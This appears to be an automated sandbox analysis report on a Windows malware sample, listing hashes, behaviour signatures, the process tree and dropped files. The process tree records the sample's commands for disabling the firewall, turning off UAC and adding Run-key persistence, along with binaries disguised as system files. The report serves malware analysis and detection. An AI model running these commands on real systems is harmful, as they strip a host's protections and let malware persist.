Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/08/2024, 06:58

General

  • Target

    a5cfa3299a49dfd7ee7eb96729fdb425_JaffaCakes118.exe

  • Size

    761KB

  • MD5

    a5cfa3299a49dfd7ee7eb96729fdb425

  • SHA1

    600ddc6eae1969f94bc73f85c21adcb22c57d001

  • SHA256

    d70e2278bb0367a9575e79f64c6da48747d4d04bda602ea309099df2150262be

  • SHA512

    ea1eef43593fed867006f394f1eb1c4ccc0c6f5f36b371458900a104b87ba462fca725868aaea1040dbc19b9288f980ac0bb02f99ec4796dfd15bfe62e200d0d

  • SSDEEP

    12288:h68eX1y8qpm5yy30WyUokkJ1wAxGW7hCaOoWsvTQVgEPvN888888888888W8888E:IrXsBpPw4rVbWs8VgEP

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Adds policy Run key to start application 2 TTPs 4 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 36 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 17 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a5cfa3299a49dfd7ee7eb96729fdb425_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\a5cfa3299a49dfd7ee7eb96729fdb425_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4716
    • C:\Windows\SysWOW64\mspaint.exe
      "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\untitled.JPG" /ForceBootstrapPaint3D
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:1204
    • C:\Users\Admin\AppData\Local\Temp\Windll32.exe
      "C:\Users\Admin\AppData\Local\Temp\Windll32.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3596
      • C:\ProgramData\WindowsUpdate\System\Isass.exe
        "C:\ProgramData\WindowsUpdate\System\Isass.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3524
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c netsh firewall set opmode DISABLE
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1556
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall set opmode DISABLE
            5⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:4904
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C "C:\Users\Public\lpt1\driver.bat"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1396
          • C:\Windows\SysWOW64\reg.exe
            REG ADD \\.\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v System. /t REG_SZ /d "C:\ProgramData\WindowsUpdate\System\Isass.exe" /f
            5⤵
            • Adds policy Run key to start application
            • System Location Discovery: System Language Discovery
            PID:4232
          • C:\Windows\SysWOW64\reg.exe
            REG ADD \\.\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            5⤵
            • UAC bypass
            • System Location Discovery: System Language Discovery
            PID:5072
    • C:\Users\Admin\AppData\Local\Temp\Windll64.exe
      "C:\Users\Admin\AppData\Local\Temp\Windll64.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1396
      • C:\Documents and Settings\All Users\WindowsUpdate\Microsoft windows\WindowsUpdate.exe
        "C:\Documents and Settings\All Users\WindowsUpdate\Microsoft windows\WindowsUpdate.exe" /start
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4288
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD \\.\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v win32 /t REG_SZ /d "C:\Documents and Settings\All Users\WindowsUpdate\Microsoft windows\WindowsUpdate.exe" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2428
          • C:\Windows\SysWOW64\reg.exe
            REG ADD \\.\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v win32 /t REG_SZ /d "C:\Documents and Settings\All Users\WindowsUpdate\Microsoft windows\WindowsUpdate.exe" /f
            5⤵
            • Adds policy Run key to start application
            • System Location Discovery: System Language Discovery
            PID:1688
  • C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe
    "C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:3724

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\WindowsUpdate\Microsoft windows\WindowsUpdate.exe

    Filesize

    140KB

    MD5

    67bc4ab7940e15c0de066cff9814860d

    SHA1

    63549930f5d3d25136d381c77fd321489ecd95ba

    SHA256

    dac0c50748938582956d597352c3c6f1063fa11c149b24e0766e8d4d94463baf

    SHA512

    eea2f476ab45ea5a04f1859373cae64c008221eaf14c3f7b8cda7ad261c41b7553b2e4466cec03b6a3faee5b73c71dc16a1951347511fc82bcac2363ec15422f

  • C:\ProgramData\WindowsUpdate\System\Isass.exe

    Filesize

    200KB

    MD5

    28faddcd0c9f6fae3b247ca42522c9a8

    SHA1

    3cbf67857093b41edbca597f66804a10cc3fde21

    SHA256

    6effed9165d3da9aa21d885dd132ba56097f3b943ce8b0506a7b584874139b49

    SHA512

    02f10dc090196f2ffdfcf6aee536ecbc11f865f4267ce7a2bc88b11d2c0b491cf65d67c9dd8e8187e01060bb711cb01b8bc814504aa16b35a2a6e981cf660e0f

  • C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\Projects\Projects.json

    Filesize

    242B

    MD5

    f5871e1026ae60de4da040fa1b6879b8

    SHA1

    d4160f1cf8eb2e122ed79e1e04fc39081e6c77b3

    SHA256

    c65e118b224661c1c1fedf008795e025d669e8f5c1744fd9ee13900f4b2d35c2

    SHA512

    5edcc6d00511c008319f0b01fb46ca009f9d9fae41e12ba990790c6964f03ce068c720b82f242c5b22308324c308b999fde8fa02ea368619d1bd7a5fa9a88864

  • C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\cloudCommunitySettings.json

    Filesize

    2KB

    MD5

    f4e4a03ebd0ab3a953c56a300d61d223

    SHA1

    97a9acf22c3bdd6989d7c120c21077c4d5a9a80e

    SHA256

    52bfb22aa2d7b0ce083d312fb8fa8dcda3063207186f99fc259aebd9064cbedc

    SHA512

    12aa71eea45720a4d7d057da0b662635671e4cd165ad2e0d30a3d2a43950b47dd60c26c1bbbe049418f815850e571b8d93e4c8b8cbbd686abc3cf7926ba719c2

  • C:\Users\Admin\AppData\Local\Temp\System\Configurations.ini

    Filesize

    111B

    MD5

    3f80399610772b8a6908c78a13cb58d3

    SHA1

    2c95c425e72529cea677dd9d98cb532c9b538884

    SHA256

    63f0d38852f92a72d45ed4e26ab2ee135961d9ed7a8c4b48a004ea037bc25394

    SHA512

    aa81ad3f030a1357cd1b1deedc225d0f0fbc5a944dc6f207861d0c11321d8db24a419175d5a6d46cd94615e3b029c089348ef7e59626079c3493c95c1af7d81a

  • C:\Users\Admin\AppData\Local\Temp\Windll32.exe

    Filesize

    200KB

    MD5

    9da887f6dd2398ba940e5cc1a145f9cd

    SHA1

    df66ab8022953c7cefc11b92ac24ffb223daa4f8

    SHA256

    55e900eca9eb5b0f57879ea43e435c968e0940ff0d7df41d9db408f88a94e8d6

    SHA512

    11ae411c13f6124ddcfb3e55b1b1fa3ff525b87abe6da64b9bb15ec34f8adda87715abee82886a2840e40cabfbcd8d7580f003f7e7636d70870006175489c630

  • C:\Users\Admin\AppData\Local\Temp\Windll64.exe

    Filesize

    140KB

    MD5

    71ebdaa1e463475fab2350ad9c8906ca

    SHA1

    346a46cdf83dff9231ba84594fa82849d6dff5b1

    SHA256

    85e8cd6cf68c947e75986dd515a1843baac44eec1b8d9edc34c69bdade217ba0

    SHA512

    a6a44409aed43ea4c122b181099acd85c9f3113e4db29b7d636fd3daafcc783d12e0b74ff9e65ced5c815ccbe0efa9b6ab63f770f5cf5e1dc3513712fae65fb1

  • C:\Users\Admin\AppData\Local\Temp\untitled.JPG

    Filesize

    279KB

    MD5

    ad8c5461df29e9175c1ca3629bed613b

    SHA1

    50293071099358ee80e85f57bafa579580c45498

    SHA256

    1b8a2d4275a294b1c401ec4512d48ca8e54ece4ce77e0ea9ff08fd232b59b9b2

    SHA512

    9caf58830ee7592c4b99bd8c48d477c4fd9f572814668feaae7bf2698a7f1262690af61c4e4f422ecf74a9245d6b86cadbce02a053f2afa0449227fcdaf3fa4c

  • C:\Users\Public\lpt1\driver.bat

    Filesize

    279B

    MD5

    6651540aa8e830270ee77f0082f1d0ae

    SHA1

    046c18c94d9f1813e59cfcb207003ed791a7bd05

    SHA256

    16b94927b71f3acd07d4afb1fa5540a016c457c59638a19d8b4c947042465a7f

    SHA512

    03a906efc33b9d89a994b028875e22787696a6398a505da454478c2920f8316242f87b7aee6c6c941aef97c969f8a9b34741e098c35098bde870777c57cff704

  • memory/4716-33-0x0000000000400000-0x00000000004C8000-memory.dmp

    Filesize

    800KB